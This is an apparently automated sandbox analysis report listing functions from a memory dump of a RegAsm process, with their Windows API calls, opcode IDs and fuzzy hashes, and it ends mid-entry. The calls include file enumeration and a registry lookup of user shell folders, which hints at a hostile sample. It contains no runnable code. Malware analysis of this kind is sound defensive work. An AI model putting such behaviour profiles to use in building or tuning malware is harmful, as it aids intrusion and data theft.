                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                                  Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$PointerRead
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3154509469-0
                                                                                                                                                                                                  • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                  • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                  Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                    • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                    • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                    • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4232544981-0
                                                                                                                                                                                                  • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                  • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                                  Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                                  • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                  • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                                  Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 514040917-0
                                                                                                                                                                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                  • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                                  Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                                                  • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                  • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                                  Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                                                                  • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                  • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                                  Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                                  • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                  • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                                  Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                  • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                  • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                                  Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                  • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                  • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                                  Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                                  • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                  • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                  Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                                  • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                  • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                                  Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: EnumNamesResource
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3334572018-0
                                                                                                                                                                                                  • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                  • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                                  Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                                  • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                  • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                                  Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseFind
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1863332320-0
                                                                                                                                                                                                  • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                  • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                                  Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                                                                  • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                  • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                                  Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                  • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                  • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                                  Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                                                  • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                                  Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                    • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                    • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                    • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3655998216-0
                                                                                                                                                                                                  • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                  • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                                  Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1828521557-0
                                                                                                                                                                                                  • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                  • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                  Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                    • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 609303285-0
                                                                                                                                                                                                  • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                                  • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
